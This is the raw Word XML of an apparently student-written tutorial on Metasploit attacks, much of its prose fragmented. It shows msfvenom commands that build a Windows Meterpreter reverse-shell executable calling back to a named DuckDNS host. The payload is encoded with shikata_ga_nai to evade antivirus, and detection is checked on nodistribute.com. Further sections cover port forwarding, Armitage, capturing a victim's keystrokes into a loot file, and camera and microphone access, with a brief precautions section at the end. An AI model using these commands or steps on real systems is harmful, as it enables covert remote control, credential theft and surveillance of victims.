    </w:p>
    <w:p w14:paraId="30C95924" w14:textId="1F9D1D3D" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="001744C8" w:rsidP="00D31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-</w:t>
      </w:r>
      <w:proofErr w:type="gram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f</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D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Pr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">format&gt; : </w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File format. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>( .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711D1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Windows )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89E954" w14:textId="4C678AA4" w:rsidR="005603C8" w:rsidRPr="005711D1" w:rsidRDefault="005603C8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FF589" wp14:editId="6C88851D">
            <wp:extent cx="5760720" cy="21336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9F01" w14:textId="7F5B1037" w:rsidR="005603C8" w:rsidRPr="005711D1" w:rsidRDefault="005603C8" w:rsidP="00D31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. (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tai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tiviru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loaker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)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ufficie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a firewall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erat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09C7C595" w14:textId="77777777" w:rsidR="006145E7" w:rsidRPr="005711D1" w:rsidRDefault="006145E7" w:rsidP="00D3142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0AC7050" w14:textId="79365E4E" w:rsidR="006145E7" w:rsidRPr="005711D1" w:rsidRDefault="006145E7" w:rsidP="00442042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#msfvenom -p Windows/</w:t>
      </w:r>
      <w:proofErr w:type="spell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eterpreter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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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verse_tcp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LHOST= LPORT= -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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xe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&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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home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/mert/logopic.exe </w:t>
      </w:r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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spell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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shikata_ga_nai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highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CCC741" w14:textId="77777777" w:rsidR="00E30FA2" w:rsidRPr="005711D1" w:rsidRDefault="00E30FA2" w:rsidP="00E30FA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF9E6BB" w14:textId="69777DA2" w:rsidR="006145E7" w:rsidRPr="005711D1" w:rsidRDefault="006145E7" w:rsidP="00D3142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lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gram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e </w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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coder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&gt;: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motion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="281B8CD7" w14:textId="76C3813F" w:rsidR="00FE0446" w:rsidRPr="005711D1" w:rsidRDefault="00FE0446" w:rsidP="00D31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hikata</w:t>
      </w:r>
      <w:proofErr w:type="gram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_ga_nai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: </w:t>
      </w:r>
      <w:r w:rsidRPr="005711D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ady-mad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45425429" w14:textId="420FC676" w:rsidR="00FE0446" w:rsidRPr="005711D1" w:rsidRDefault="00FE0446" w:rsidP="00D31427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711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711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termin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ncryp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30CE9810" w14:textId="51C78436" w:rsidR="006145E7" w:rsidRPr="005711D1" w:rsidRDefault="00FE0446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7F6B0" wp14:editId="606029F1">
            <wp:extent cx="5753100" cy="19431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8FE5E" w14:textId="419FCF3F" w:rsidR="001744C8" w:rsidRPr="005711D1" w:rsidRDefault="00FE0446" w:rsidP="00D31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ad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evious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di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711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ncryp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seve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siz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ecam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ncryp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Sinc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ady-mad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ncoder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e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time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do no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how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asical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rangeme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1B8D0AC2" w14:textId="77777777" w:rsidR="0037352F" w:rsidRPr="005711D1" w:rsidRDefault="0037352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2136C4" w14:textId="77777777" w:rsidR="00D31427" w:rsidRPr="005711D1" w:rsidRDefault="00D314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A4E76" w14:textId="77777777" w:rsidR="00D31427" w:rsidRPr="005711D1" w:rsidRDefault="00D3142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E6F0B" w14:textId="3B088BFC" w:rsidR="00FE0446" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc72673309"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00FE0446" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gainst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/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="00FE0446" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>antivirus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0446" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0446" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>programs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0037352F" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2060511C" w14:textId="480FCEB6" w:rsidR="0037352F" w:rsidRPr="005711D1" w:rsidRDefault="0037352F" w:rsidP="00D31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r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nodistribute.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sit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Through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site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zen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iffe</w:t>
      </w:r>
      <w:r w:rsidR="00D31427" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D31427" w:rsidRPr="005711D1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="00D31427" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D31427" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> program.</w:t>
      </w:r>
      <w:r w:rsidR="00D31427"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85F86" wp14:editId="22867D0E">
            <wp:extent cx="5257800" cy="5222981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80" cy="523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F429" w14:textId="7CDD47B5" w:rsidR="00D31427" w:rsidRPr="005711D1" w:rsidRDefault="00D31427" w:rsidP="00D314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As can b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tiviru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da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t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atisfactor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fessional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id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ques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be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ictu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wnload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ternet, a program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..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talk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tec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ituation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28D6B17D" w14:textId="77777777" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC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9B320E" w14:textId="77777777" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC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C98028" w14:textId="13F12805" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc72673310"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>from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remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5014D693" w14:textId="3C05B5F4" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC" w:rsidP="0044204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Setting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up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Remote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Pc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connection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Metasploit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Framework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Duck</w:t>
      </w:r>
      <w:r w:rsidR="00CC285B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E204B81" w14:textId="177D09C2" w:rsidR="006A0AEC" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC" w:rsidP="006A0AE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b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C921438" wp14:editId="7B0C56E4">
            <wp:extent cx="6485313" cy="14173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52" cy="14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8A41" w14:textId="69D9D727" w:rsidR="0037352F" w:rsidRPr="005711D1" w:rsidRDefault="006A0AEC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cei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1D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etwork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emporar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selv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uckDN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file of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DuckDNS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66B" w:rsidRPr="005711D1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0C566B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651FF099" w14:textId="69BD6C92" w:rsidR="000C566B" w:rsidRPr="005711D1" w:rsidRDefault="000C566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76179B" wp14:editId="1414C4A7">
            <wp:extent cx="4373880" cy="3893820"/>
            <wp:effectExtent l="0" t="0" r="762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1C58" w14:textId="18026861" w:rsidR="000C566B" w:rsidRPr="005711D1" w:rsidRDefault="000C566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D95A28" wp14:editId="453C1DB9">
            <wp:extent cx="5257800" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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175A" w14:textId="77777777" w:rsidR="00AB424D" w:rsidRPr="005711D1" w:rsidRDefault="000C566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BB88CEB" w14:textId="1B257FF8" w:rsidR="000C566B" w:rsidRPr="005711D1" w:rsidRDefault="000C56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1D1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cond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ermission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modem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modem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urpos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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PORT</w:t>
      </w:r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6488B41B" w14:textId="1BC660C3" w:rsidR="000C566B" w:rsidRPr="005711D1" w:rsidRDefault="00082EE9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Sinc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iffer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dem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por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1D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xchang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comme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ur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gai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afe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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02074FB3" w14:textId="77777777" w:rsidR="00082EE9" w:rsidRPr="005711D1" w:rsidRDefault="00082E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6A2596" w14:textId="77777777" w:rsidR="00AB424D" w:rsidRPr="005711D1" w:rsidRDefault="00AB42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A4E29" w14:textId="77777777" w:rsidR="00AB424D" w:rsidRPr="005711D1" w:rsidRDefault="00AB42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7ACFD7" w14:textId="2F30BCDE" w:rsidR="00082EE9" w:rsidRPr="005711D1" w:rsidRDefault="00082EE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sfvenom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-p Windows/</w:t>
      </w:r>
      <w:proofErr w:type="spell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eterpreter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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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verse_tcp</w:t>
      </w:r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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_dns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LHOST=mertkahramanturkk.duckdns.org LPORT=443 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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exe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&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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home</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D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/mert/DNS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F8845" w14:textId="1219D8B3" w:rsidR="00AB424D" w:rsidRPr="005711D1" w:rsidRDefault="00082EE9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finite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verse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_dn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1D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utomatic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domain nam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v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terrup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server, no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p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r w:rsidR="00A815C8" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A815C8" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119591CB" w14:textId="4D748BEB" w:rsidR="00A815C8" w:rsidRPr="005711D1" w:rsidRDefault="00A815C8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86BCB6" wp14:editId="6B4E1965">
            <wp:extent cx="5234940" cy="5257800"/>
            <wp:effectExtent l="0" t="0" r="381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EE54E" w14:textId="049B0733" w:rsidR="00A815C8" w:rsidRPr="005711D1" w:rsidRDefault="00A815C8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isten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tar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en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sent, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D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ckag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v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(mertkahramanturkk.duckdns.org).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092987A" w14:textId="0FB4E64F" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="00287714" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc72673311"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ARMİTAGE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="52F053A4" w14:textId="77777777" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="00287714" w:rsidP="00287714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1D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xtrac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time. A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avigat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sfconso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as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lot of tim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ett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--l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mitag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68C593D1" w14:textId="79F2C5A9" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="00287714" w:rsidP="002877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mitag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14:paraId="7195CF2A" w14:textId="686ADDAD" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="00287714" w:rsidP="00287714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2F9D2B" wp14:editId="5652ED82">
            <wp:extent cx="4541520" cy="474726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A283" w14:textId="77777777" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="00287714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5C3590E" w14:textId="77777777" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="00287714">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C72C15" w14:textId="1E783CDB" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="00287714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mitag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4C5D6DA2" w14:textId="77777777" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="002877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ACE524" w14:textId="77777777" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="0028771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1B60D7" w14:textId="51213625" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc72673312"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="005A1DDD" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Process </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A1DDD" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B239CB7" w14:textId="28D709E5" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="002877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n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entere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first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requeste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password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t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coul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be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company'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databas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cces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, bank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ccounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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..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first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ntegrat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highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>keylogger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nto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ccessing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fterward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every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passwor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ritten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other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party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come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computer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riting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xt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specifie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CA36A09" w14:textId="42DED19D" w:rsidR="005A1DDD" w:rsidRPr="005711D1" w:rsidRDefault="005A1DDD" w:rsidP="00287714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0ED3B49E" wp14:editId="7D47B45A">
            <wp:extent cx="5753100" cy="4030980"/>
            <wp:effectExtent l="0" t="0" r="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4FA2" w14:textId="0E7F05EE" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="009D2D3D" w:rsidP="002877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keylogg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av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fil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r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/home/mert/.msf4/loot/20210522075546_default_192.168.0.18_host.windows.key_991203.txt</w:t>
      </w:r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133562" w14:textId="1A1D5FC6" w:rsidR="009D2D3D" w:rsidRPr="005711D1" w:rsidRDefault="009D2D3D" w:rsidP="00287714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88A5E" wp14:editId="65D58A81">
            <wp:extent cx="3603801" cy="314706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55" cy="315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DD88" w14:textId="6CEDDE07" w:rsidR="00287714" w:rsidRPr="005711D1" w:rsidRDefault="009D2D3D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A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keyboar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highlight w:val="yellow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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r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7C6BA82D" w14:textId="059FE744" w:rsidR="009D2D3D" w:rsidRPr="005711D1" w:rsidRDefault="00CC285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can do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camera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microphone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2D3D" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:proofErr w:type="gram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transfer of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3D" w:rsidRPr="005711D1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="009D2D3D" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277DA57" w14:textId="09B35BC3" w:rsidR="00DA509E" w:rsidRPr="005711D1" w:rsidRDefault="00DA509E" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc72673313"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>There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are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some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precautions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we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should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take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to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avoid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such</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4A578BFE" w14:textId="77777777" w:rsidR="00DA509E" w:rsidRPr="005711D1" w:rsidRDefault="00DA509E" w:rsidP="00DA509E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lw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cess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asical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ytim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’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’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1BA26080" w14:textId="78160AF0" w:rsidR="00DA509E" w:rsidRPr="005711D1" w:rsidRDefault="00DA509E" w:rsidP="00DA509E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lw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enetra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rea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ow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urf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ack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egitima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sit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rv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liciou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ec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nfamilia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liciou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1D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attachme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et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veryth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els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web o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ack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qual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lw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40D40BBA" w14:textId="382AF180" w:rsidR="00DA509E" w:rsidRPr="005711D1" w:rsidRDefault="00DA509E" w:rsidP="00DA509E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liciou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id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eming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egitima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wnload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ink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(in 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ha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Her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arn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stall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special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ek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</w:p>
